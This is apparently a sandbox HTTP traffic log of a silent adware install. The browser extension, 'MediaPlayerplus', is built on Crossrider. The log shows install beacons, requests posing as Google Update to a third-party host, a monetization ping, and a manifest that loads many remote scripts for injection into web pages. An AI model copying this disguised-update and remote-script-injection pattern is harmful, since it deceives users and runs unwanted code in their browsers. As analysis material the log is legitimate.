    Content-Length: 56928
    Cache-Control: max-age=10076
    Date: Tue, 21 Oct 2014 03:33:49 GMT
    Connection: keep-alive
    X-CCC: NO
    X-CID: 2

    <<< skipped >>>

    GET /omaha/B13CB685-2858-4509-BB2E-34E3545B73F9/1/update.xml?rand=3098&w=3:uxP7lqHPgjR31A1VCO5ingXndb1rFK_KAHySpOeS13mFOEtsynLmgcq7I6NOZRbf7J9PCORCxJAYvLQBx2b-1W8C0I5TnOv5uontBSViwgQRQhARK-F_MdynNh4BLVWmYQSh2YIjyRn92lVEe91SjRxOzYFYrMl6EX22_Crgr2Q HTTP/1.1
    User-Agent: Google Update/1.3.25.0;winhttp;cup
    X-Last-HR: 0x0
    X-Last-HTTP-Status-Code: 0
    X-Retry-Count: 0
    If-Match: "BRHtvIFHcNUSomdLAnWeH6iI1SQ"
    Host: update.clientstaticserv.com
    Connection: Keep-Alive
    Cache-Control: no-cache
    Pragma: no-cache


    HTTP/1.1 200 OK
    Date: Tue, 21 Oct 2014 03:33:57 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1399811332"
    Last-Modified: Sun, 11 May 2014 12:28:52 GMT
    Cache-Control: max-age=21600
    Content-Length: 403
    Content-Type: text/xml; charset=UTF-8
    X-HW: 1413862436.dop017.am4.t,1413862437.cds067.am4.s,1413862436.dop001.se1.r,1413862436.cds019.se1.p,1413862437.cds067.am4.p
    <?xml version="1.0" encoding="UTF-8"?>.<response protocol="3.
    0" server="prod">. <daystart elapsed_seconds="56508"/>. <
    app appid="{430FD4D0-B729-4F61-AA34-91526481799D}" status="ok">.
    <updatecheck status="noupdate"/>. <ping status="ok"/>
    . </app>. <app appid="{b13cb685-2858-4509-bb2e-34e3545b73f9
    }" status="ok">. <updatecheck status="noupdate"/>. <
    ping status="ok"/>. </app>.</response>.
    ....



    GET /omaha/B13CB685-2858-4509-BB2E-34E3545B73F9/1/update.xml?rand=3098 HTTP/1.1

    User-Agent: Google Update/1.3.25.0;winhttp
    X-Last-HR: 0x80040881
    X-Last-HTTP-Status-Code: 200
    X-Retry-Count: 0
    Host: update.clientstaticserv.com
    Connection: Keep-Alive
    Cache-Control: no-cache
    Pragma: no-cache


    HTTP/1.1 200 OK
    Date: Tue, 21 Oct 2014 03:33:57 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1399811332"
    Last-Modified: Sun, 11 May 2014 12:28:52 GMT
    Cache-Control: max-age=21600
    Content-Length: 403
    Content-Type: text/xml; charset=UTF-8
    X-HW: 1413862436.dop017.am4.t,1413862437.cds067.am4.c
    <?xml version="1.0" encoding="UTF-8"?>.<response protocol="3.
    0" server="prod">. <daystart elapsed_seconds="56508"/>. <
    app appid="{430FD4D0-B729-4F61-AA34-91526481799D}" status="ok">.
    <updatecheck status="noupdate"/>. <ping status="ok"/>
    . </app>. <app appid="{b13cb685-2858-4509-bb2e-34e3545b73f9
    }" status="ok">. <updatecheck status="noupdate"/>. <
    ping status="ok"/>. </app>.</response>...


    GET /installer.gif?action=started&browser=ie&browserver=6&ver=1_34_05_12&bic=EAEB041DFB674B59BB4BCF5DE150DAB5IE&app=54246&appver=0&verifier=60aa827dc6ab7283db367fb7eb2cda1a&srcid=001359&version_date=16-05-14&subid=0&zdata=0&xpiver=0_94&crxver=1_26_33&default=ie&chver=na&ffver=na&iever=6&silent=1&os=XP32&admin=1&type=17179881473&asw=0&asw2=8704&procstarttime=1413862412&procruntime=10&rnd=1413862422 HTTP/1.1
    Host: stats.clientstaticserv.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    x-amz-id-2: iWgZhMz61hH/abToeYxoWIIfOlw 1rP1wEWRnHmzYuJ7751g9oDM0KlFWLStwYTM
    x-amz-request-id: B896F103AC0DE8FA
    Date: Tue, 21 Oct 2014 03:33:43 GMT
    Cache-Control: no-cache, must-revalidate
    Expires: Mon, 26 Jul 1997 05:00:00 GMT
    Last-Modified: Mon, 24 Feb 2014 23:56:39 GMT
    ETag: "28d6814f309ea289f847c69cf91194c6"
    Content-Type: image/gif
    Content-Length: 35
    Server: AmazonS3
    GIF89a.............,...........D..;....



    GET /installer.gif?action=finished&browser=ie&browserver=6&ver=1_34_05_12&bic=EAEB041DFB674B59BB4BCF5DE150DAB5IE&app=54246&appver=102&verifier=60aa827dc6ab7283db367fb7eb2cda1a&srcid=001359&version_date=16-05-14&subid=0&zdata=0&xpiver=0_94&crxver=1_26_33&default=ie&chver=na&ffver=na&iever=6&silent=1&os=XP32&admin=1&type=17179881473&asw=0&asw2=8704&ieprofiles=1&chprofiles=na&ffprofiles=na&procstarttime=1413862412&procruntime=30&rnd=1413862442 HTTP/1.1

    Host: stats.clientstaticserv.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    x-amz-id-2: ANu wI9oJQ8 gzBNohUzdmuUThDrmHvL3uEQGuiVJFnmiGB1Qf6E3dMGaC2mixIL
    x-amz-request-id: 00FF35758F9B059E
    Date: Tue, 21 Oct 2014 03:34:03 GMT
    Cache-Control: no-cache, must-revalidate
    Expires: Mon, 26 Jul 1997 05:00:00 GMT
    Last-Modified: Mon, 24 Feb 2014 23:56:39 GMT
    ETag: "28d6814f309ea289f847c69cf91194c6"
    Content-Type: image/gif
    Content-Length: 35
    Server: AmazonS3
    GIF89a.............,...........D..;....



    GET /apps.gif?action=install&browser=ie&browserver=6&ver=1_34_05_12&bic=EAEB041DFB674B59BB4BCF5DE150DAB5IE&app=54246&appver=102&verifier=60aa827dc6ab7283db367fb7eb2cda1a&srcid=001359&version_date=16-05-14&installtime=1413862412&curtime=1413862412&lifetime=0&silent=1&procstarttime=1413862412&procruntime=30&rnd=1413862442 HTTP/1.1

    Host: stats.clientstaticserv.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    x-amz-id-2:  oQ1YkHy5hkWQABIFmdoyLL4OO1kXa04na2FBbZght FjWo3f2 kzB0GF/3vcwBT
    x-amz-request-id: 9EBE31A8291AC950
    Date: Tue, 21 Oct 2014 03:34:03 GMT
    Cache-Control: no-cache, must-revalidate
    Expires: Mon, 26 Jul 1997 05:00:00 GMT
    Last-Modified: Mon, 24 Feb 2014 23:56:30 GMT
    ETag: "28d6814f309ea289f847c69cf91194c6"
    Content-Type: image/gif
    Content-Length: 35
    Server: AmazonS3
    GIF89a.............,...........D..;..


    GET /plugins/mins/275.js?ver=3&rnd=41 HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.newdatastatsserv.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Tue, 21 Oct 2014 03:33:57 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1405263879"
    Last-Modified: Sun, 13 Jul 2014 15:04:39 GMT
    Cache-Control: max-age=900
    Content-Length: 823
    Content-Type: application/x-javascript; charset=UTF-8
    X-HW: 1413862437.dop013.am4.t,1413862437.cds054.am4.c



    GET /plugins/mins/289.js?ver=1&rnd=41 HTTP/1.1

    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.newdatastatsserv.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Tue, 21 Oct 2014 03:33:57 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1413821196"
    Last-Modified: Mon, 20 Oct 2014 16:06:36 GMT
    Cache-Control: max-age=152
    Content-Length: 903
    Content-Type: application/x-javascript; charset=UTF-8
    X-HW: 1413862437.dop013.am4.t,1413862437.cds054.am4.c



    GET /plugins/mins/260.js?ver=4&rnd=41 HTTP/1.1

    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.newdatastatsserv.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Tue, 21 Oct 2014 03:33:56 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1405263875"
    Last-Modified: Sun, 13 Jul 2014 15:04:35 GMT
    Cache-Control: max-age=900
    Content-Length: 823
    Content-Type: application/x-javascript; charset=UTF-8
    X-HW: 1413862436.dop013.am4.t,1413862436.cds046.am4.c



    GET /plugins/mins/244.js?ver=5&rnd=41 HTTP/1.1

    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.newdatastatsserv.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Tue, 21 Oct 2014 03:33:57 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1405263865"
    Last-Modified: Sun, 13 Jul 2014 15:04:25 GMT
    Cache-Control: max-age=900
    Content-Length: 1103
    Content-Type: application/x-javascript; charset=UTF-8
    X-HW: 1413862437.dop013.am4.t,1413862437.cds039.am4.c



    GET /plugins/mins/242.js?ver=4&rnd=8467 HTTP/1.1

    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.newdatastatsserv.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Tue, 21 Oct 2014 03:33:57 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1403211500"
    Last-Modified: Thu, 19 Jun 2014 20:58:20 GMT
    Cache-Control: max-age=900
    Content-Length: 1023
    Content-Type: application/x-javascript; charset=UTF-8
    X-HW: 1413862437.dop013.am4.t,1413862437.cds039.am4.c



    GET /plugins/mins/230.js?ver=7&rnd=8467 HTTP/1.1

    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.newdatastatsserv.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Tue, 21 Oct 2014 03:33:57 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1408273144"
    Last-Modified: Sun, 17 Aug 2014 10:59:04 GMT
    Cache-Control: max-age=900
    Content-Length: 867
    Content-Type: application/x-javascript; charset=UTF-8
    X-HW: 1413862437.dop013.am4.t,1413862437.cds039.am4.c



    GET /plugins/mins/223.js?ver=8&rnd=8467 HTTP/1.1

    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.newdatastatsserv.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Tue, 21 Oct 2014 03:33:56 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1404137812"
    Last-Modified: Mon, 30 Jun 2014 14:16:52 GMT
    Cache-Control: max-age=900
    Content-Length: 823
    Content-Type: application/x-javascript; charset=UTF-8
    X-HW: 1413862436.dop013.am4.t,1413862436.cds068.am4.c



    GET /plugins/mins/211.js?ver=7&rnd=8467 HTTP/1.1

    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.newdatastatsserv.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Tue, 21 Oct 2014 03:33:57 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1408273147"
    Last-Modified: Sun, 17 Aug 2014 10:59:07 GMT
    Cache-Control: max-age=64
    Content-Length: 867
    Content-Type: application/x-javascript; charset=UTF-8
    X-HW: 1413862437.dop013.am4.t,1413862437.cds041.am4.c



    GET /plugins/mins/220.js?ver=23&rnd=8467 HTTP/1.1

    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.newdatastatsserv.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Tue, 21 Oct 2014 03:33:57 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1413711006"
    Last-Modified: Sun, 19 Oct 2014 09:30:06 GMT
    Cache-Control: max-age=633
    Content-Length: 33490
    Content-Type: application/x-javascript; charset=UTF-8
    X-HW: 1413862437.dop013.am4.t,1413862437.cds041.am4.c

    <<< skipped >>>

    GET /plugins/mins/184.js?ver=10&rnd=6334 HTTP/1.1

    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.newdatastatsserv.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Tue, 21 Oct 2014 03:33:57 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1403604769"
    Last-Modified: Tue, 24 Jun 2014 10:12:49 GMT
    Cache-Control: max-age=587
    Content-Length: 1239
    Content-Type: application/x-javascript; charset=UTF-8
    X-HW: 1413862437.dop013.am4.t,1413862437.cds042.am4.c

    <<< skipped >>>

    GET /plugins/mins/104.js?ver=12&rnd=6334 HTTP/1.1

    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.newdatastatsserv.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Tue, 21 Oct 2014 03:33:57 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1407146074"
    Last-Modified: Mon, 04 Aug 2014 09:54:34 GMT
    Cache-Control: max-age=781
    Content-Length: 919
    Content-Type: application/x-javascript; charset=UTF-8
    X-HW: 1413862437.dop013.am4.t,1413862437.cds042.am4.c



    GET /plugins/mins/93.js?ver=13&rnd=6334 HTTP/1.1

    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.newdatastatsserv.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Tue, 21 Oct 2014 03:33:57 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1403819081"
    Last-Modified: Thu, 26 Jun 2014 21:44:41 GMT
    Cache-Control: max-age=900
    Content-Length: 951
    Content-Type: application/x-javascript; charset=UTF-8
    X-HW: 1413862437.dop013.am4.t,1413862437.cds040.am4.c



    GET /plugins/mins/269.js?ver=1&rnd=6334 HTTP/1.1

    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.newdatastatsserv.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Tue, 21 Oct 2014 03:33:57 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1403007487"
    Last-Modified: Tue, 17 Jun 2014 12:18:07 GMT
    Cache-Control: max-age=900
    Content-Length: 491
    Content-Type: application/x-javascript; charset=UTF-8
    X-HW: 1413862437.dop013.am4.t,1413862437.cds046.am4.c



    GET /plugins/mins/246.js?ver=15&rnd=6334 HTTP/1.1

    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.newdatastatsserv.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Tue, 21 Oct 2014 03:33:57 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1411293500"
    Last-Modified: Sun, 21 Sep 2014 09:58:20 GMT
    Cache-Control: max-age=15
    Content-Length: 8475
    Content-Type: application/x-javascript; charset=UTF-8
    X-HW: 1413862437.dop013.am4.t,1413862437.cds046.am4.c

    <<< skipped >>>

    GET /plugins/javascripts/jquery-1_7_1_min.js?ver=5&rnd=6334 HTTP/1.1

    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.newdatastatsserv.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Tue, 21 Oct 2014 03:33:57 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1407922596"
    Last-Modified: Wed, 13 Aug 2014 09:36:36 GMT
    Cache-Control: max-age=900
    Content-Length: 94779
    Content-Type: application/x-javascript; charset=UTF-8
    X-HW: 1413862437.dop013.am4.t,1413862437.cds039.am4.c

    <<< skipped >>>

    GET /monetization.gif?rand=3098&event=7&agent_type=2&ibic=EAEB041DFB674B59BB4BCF5DE150DAB5IE&bic=EAEB041DFB674B59BB4BCF5DE150DAB5IE&verifier=60aa827dc6ab7283db367fb7eb2cda1a&campaign=001359 HTTP/1.1
    User-Agent: Google Update/1.3.25.0;winhttp
    X-Last-HR: 0x0
    X-Last-HTTP-Status-Code: 0
    X-Retry-Count: 0
    Host: logs.clientstaticserv.com
    Connection: Keep-Alive
    Cache-Control: no-cache
    Pragma: no-cache


    HTTP/1.1 200 OK
    Date: Tue, 21 Oct 2014 03:33:57 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1389114507"
    Last-Modified: Tue, 07 Jan 2014 17:08:27 GMT
    Cache-Control: max-age=86400
    Content-Length: 35
    Content-Type: image/gif
    X-HW: 1413862437.dop011.am4.t,1413862437.cds058.am4.c
    GIF89a.............,...........D..;..


    GET /ThawteTimestampingCA.crl HTTP/1.1
    Accept: */*
    User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
    Host: crl.thawte.com
    Connection: Keep-Alive
    Cache-Control: no-cache
    Pragma: no-cache


    HTTP/1.1 200 OK
    Server: Apache
    ETag: "075003e67d35591a801778336e66e994:1411607711"
    Last-Modified: Thu, 25 Sep 2014 01:15:11 GMT
    Date: Tue, 21 Oct 2014 03:33:49 GMT
    Content-Length: 341
    Connection: keep-alive
    Content-Type: application/pkix-crl


    GET /omaha/430FD4D0-B729-4F61-AA34-91526481799D/1/ping.xml?rand=3095 HTTP/1.1
    User-Agent: Google Update/1.3.25.0;winhttp
    X-Last-HR: 0x0
    X-Last-HTTP-Status-Code: 0
    X-Retry-Count: 0
    Host: update.clientstaticserv.com
    Connection: Keep-Alive
    Cache-Control: no-cache
    Pragma: no-cache


    HTTP/1.1 200 OK
    Date: Tue, 21 Oct 2014 03:33:56 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1399825872"
    Last-Modified: Sun, 11 May 2014 16:31:12 GMT
    Cache-Control: max-age=3316
    Content-Length: 229
    Content-Type: text/xml; charset=UTF-8
    X-HW: 1413862436.dop012.am4.t,1413862436.cds062.am4.c
    <?xml version="1.0" encoding="UTF-8"?>
    <response protocol="3.0" server="prod">
      <daystart elapsed_seconds="56754"/>
      <app appid="{430fd4d0-b729-4f61-aa34-91526481799d}" status="ok">
        <event status="ok"/>
      </app>
    </response>


    GET /omaha/B13CB685-2858-4509-BB2E-34E3545B73F9/1/ping.xml?rand=3105 HTTP/1.1
    User-Agent: Google Update/1.3.25.0;winhttp
    X-Last-HR: 0x0
    X-Last-HTTP-Status-Code: 0
    X-Retry-Count: 0
    Host: update.clientstaticserv.com
    Connection: Keep-Alive
    Cache-Control: no-cache
    Pragma: no-cache


    HTTP/1.1 200 OK
    Date: Tue, 21 Oct 2014 03:33:58 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1399811336"
    Last-Modified: Sun, 11 May 2014 12:28:56 GMT
    Cache-Control: max-age=21600
    Content-Length: 229
    Content-Type: text/xml; charset=UTF-8
    X-HW: 1413862437.dop012.am4.t,1413862438.cds046.am4.s,1413862438.dop003.se1.r,1413862438.cds016.se1.p,1413862438.cds046.am4.p
    <?xml version="1.0" encoding="UTF-8"?>
    <response protocol="3.0" server="prod">
      <daystart elapsed_seconds="56754"/>
      <app appid="{430FD4D0-B729-4F61-AA34-91526481799D}" status="ok">
        <event status="ok"/>
      </app>
    </response>


    GET /tss-ca-g2.crl HTTP/1.1
    Accept: */*
    User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
    Host: ts-crl.ws.symantec.com
    Connection: Keep-Alive
    Cache-Control: no-cache
    Pragma: no-cache


    HTTP/1.1 200 OK
    Server: Apache
    ETag: "8511e81ed9a0e75095d40bb42766b437:1413839808"
    Last-Modified: Mon, 20 Oct 2014 21:16:48 GMT
    Date: Tue, 21 Oct 2014 03:33:49 GMT
    Content-Length: 477
    Connection: keep-alive
    Content-Type: application/pkix-crl


    GET /plugin/apps/54246/manifest/1_34_05_12/ie6/manifest.xml?ver=33&rnd=4638 HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.clientstaticserv.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Tue, 21 Oct 2014 03:33:55 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1412095900"
    Last-Modified: Tue, 30 Sep 2014 16:51:40 GMT
    Cache-Control: max-age=900
    Content-Length: 1706
    Content-Type: text/xml; charset=UTF-8
    X-HW: 1413862435.dop013.am4.t,1413862435.cds049.am4.pr
    <?xml version="1.0" encoding="UTF-8"?>
    <CrAppInfo>
      <Ver>102</Ver>
      <ShortName>MediaPlayerplus</ShortName>
      <Description>MediaPlayerEnhance Extension</Description>
      <PublisherName>Freeven</PublisherName>
      <HomePageLink>NA</HomePageLink>
      <JSLink>hXXp://js.newdatastatsserv.com/plugin/apps/54246/js/na/ie/app_code.js</JSLink>
      <GroupID>0</GroupID>
      <Domain>NA</Domain>
      <RunInIframe>false</RunInIframe>
      <ThanksURL>NA</ThanksURL>
      <EmailSignature>NA</EmailSignature>
      <SettingsURL>NA</SettingsURL>
      <CertifiedInstall>NA</CertifiedInstall>
      <ExposeSites>NA</ExposeSites>
      <RemoteFBApiURL>NA</RemoteFBApiURL>
      <DisableIE>true</DisableIE>
      <DisableFF>true</DisableFF>
      <EnableSearchIE>false</EnableSearchIE>
      <EnableSearchFF>false</EnableSearchFF>
      <AddressbarIE>NA</AddressbarIE>
      <AddressbarFF>NA</AddressbarFF>
      <AddressbarFFEnhanced>NA</AddressbarFFEnhanced>
      <AddressbarCR>NA</AddressbarCR>
      <NewTabURL>NA</NewTabURL>
      <NewTabEmbed>NA</NewTabEmbed>
      <OpenSearchURL>NA</OpenSearchURL>
      <BackgroundJS>hXXp://js.newdatastatsserv.com/plugin/apps/54246/bg/na/ie/bg_code.js</BackgroundJS>
      <BackgroundVer>2</BackgroundVer>
      <Manifest>NA</Manifest>
      &l

    <<< skipped >>>

    GET /plugin/apps/54246/js/na/ie/app_code.js?ver=102&rnd=6758 HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.newdatastatsserv.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Tue, 21 Oct 2014 03:33:55 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1412093723"
    Last-Modified: Tue, 30 Sep 2014 16:15:23 GMT
    Cache-Control: max-age=496
    Content-Length: 736
    Content-Type: application/x-javascript; charset=UTF-8
    X-HW: 1413862435.dop013.am4.t,1413862435.cds056.am4.c
    /************************************************************************************
      This is your Page Code. The appAPI.ready() code block will be executed on every page load.
      For more information please visit our docs site: hXXp://docs.crossrider.com
    *************************************************************************************/

    appAPI.ready(function($) {

      //alert(appAPI.isMatchPages("*youtube*"));
      //alert(appAPI.isMatchPages("*watch*"));
      //alert(appAPI.isMatchPages("*hd=1*"))

      if (appAPI.isMatchPages("*youtube*") && appAPI.isMatchPages("*watch*") && !appAPI.isMatchPages("*hd=1*")) {
        //alert(window.location);
        window.location = window.location + "&hd=1"
        //alert(window.location);
      }

    });
    ....



    GET /plugin/apps/54246/bg/na/ie/bg_code.js?ver=2&rnd=3013 HTTP/1.1

    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.newdatastatsserv.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Tue, 21 Oct 2014 03:33:56 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1412093734"
    Last-Modified: Tue, 30 Sep 2014 16:15:34 GMT
    Cache-Control: max-age=900
    Content-Length: 432
    Content-Type: application/x-javascript; charset=UTF-8
    X-HW: 1413862436.dop013.am4.t,1413862436.cds042.am4.pr
    /************************************************************************************
      This is your background code.
      For more information please visit our wiki site:
      hXXp://docs.crossrider.com/#!/guide/scopes_background
    *************************************************************************************/

    appAPI.ready(function($) {

      // Place your code here (ideal for handling browser button, global timers, etc.)

    });
    ....



    GET /plugin/apps/54246/plugins/na/ie/plugins.json?ver=93&rnd=9729 HTTP/1.1

    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.newdatastatsserv.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Tue, 21 Oct 2014 03:33:56 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1412093724"
    Last-Modified: Tue, 30 Sep 2014 16:15:24 GMT
    Cache-Control: max-age=900
    Content-Length: 18161
    Content-Type: text/plain; charset=UTF-8
    X-HW: 1413862436.dop013.am4.t,1413862436.cds047.am4.pr
    {.."plugins_version": 93,.."plugins_list":.    [.      {"id":4,"url":"
    hXXp://js.newdatastatsserv.com/plugins/javascripts/jquery-1_7_1_min.js
    ","ver":5,"name":"jquery_1_7_1","browsers":{"ie":true,"ff":true,"ch":t
    rue,"sf":true,"nv":true,"px":true},"targets":[{"run_at":1,"order":1020
    0},{"run_at":0,"order":100},{"run_at":5,"order":100},{"run_at":2,"orde
    r":10200}],"enabled":true},{"id":2,"url":"hXXp://js.newdatastatsserv.c
    om/plugins/mins/2.js","ver":2,"name":"ie8_fix_1","browsers":{"ie":true
    ,"ff":false,"ch":false,"sf":false,"nv":false,"px":false},"targets":[{"
    run_at":1,"order":10100},{"run_at":2,"order":10100}],"enabled":true},{
    "id":3,"url":"hXXp://js.newdatastatsserv.com/plugins/mins/3.js","ver":
    2,"name":"ie8_fix_2","browsers":{"ie":true,"ff":false,"ch":false,"sf":
    false,"nv":false,"px":false},"targets":[{"run_at":1,"order":10300},{"r
    un_at":2,"order":10300}],"enabled":true},{"id":47,"url":"hXXp://js.new
    datastatsserv.com/plugins/mins/47.js","ver":3,"name":"resources_backgr
    ound","browsers":{"ie":true,"ff":true,"ch":true,"sf":true,"nv":false,"
    px":false},"targets":[{"run_at":0,"order":30000},{"run_at":5,"order":3
    0000}],"enabled":true},{"id":246,"url":"hXXp://js.newdatastatsserv.com
    /plugins/mins/246.js","ver":15,"name":"setup","browsers":{"ie":true,"f
    f":true,"ch":true,"sf":true,"nv":true,"px":true},"targets":[{"run_at":
    0,"order":5},{"run_at":1,"order":5}],"enabled":true},{"id":267,"url":"
    hXXp://js.newdatastatsserv.com/plugins/mins/267.js","ver":1,"name":"st
    ats_ch","browsers":{"ie":false,"ff":false,"ch":true,"sf":false,"nv

    <<< skipped >>>

    GET /plugins/mins/42.js?ver=10&rnd=41 HTTP/1.1

    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.newdatastatsserv.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Tue, 21 Oct 2014 03:33:56 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1409568411"
    Last-Modified: Mon, 01 Sep 2014 10:46:51 GMT
    Cache-Control: max-age=900
    Content-Length: 7866
    Content-Type: application/x-javascript; charset=UTF-8
    X-HW: 1413862436.dop013.am4.t,1413862436.cds038.am4.c

    <<< skipped >>>

    GET /plugins/mins/281.js?ver=2&rnd=41 HTTP/1.1

    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.newdatastatsserv.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Tue, 21 Oct 2014 03:33:56 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1403604591"
    Last-Modified: Tue, 24 Jun 2014 10:09:51 GMT
    Cache-Control: max-age=900
    Content-Length: 483
    Content-Type: application/x-javascript; charset=UTF-8
    X-HW: 1413862436.dop013.am4.t,1413862436.cds064.am4.c

    ....



    GET /plugins/mins/286.js?ver=2&rnd=41 HTTP/1.1

    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.newdatastatsserv.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Tue, 21 Oct 2014 03:33:56 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1403817866"
    Last-Modified: Thu, 26 Jun 2014 21:24:26 GMT
    Cache-Control: max-age=900
    Content-Length: 975
    Content-Type: application/x-javascript; charset=UTF-8
    X-HW: 1413862436.dop013.am4.t,1413862436.cds064.am4.c



    GET /plugins/mins/273.js?ver=4&rnd=41 HTTP/1.1

    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.newdatastatsserv.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Tue, 21 Oct 2014 03:33:57 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1405263856"
    Last-Modified: Sun, 13 Jul 2014 15:04:16 GMT
    Cache-Control: max-age=900
    Content-Length: 1047
    Content-Type: application/x-javascript; charset=UTF-8
    X-HW: 1413862437.dop013.am4.t,1413862437.cds054.am4.c



    GET /plugins/mins/262.js?ver=2&rnd=41 HTTP/1.1

    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.newdatastatsserv.com
    Connection: Keep-Alive
    Cache-Control: no-cache


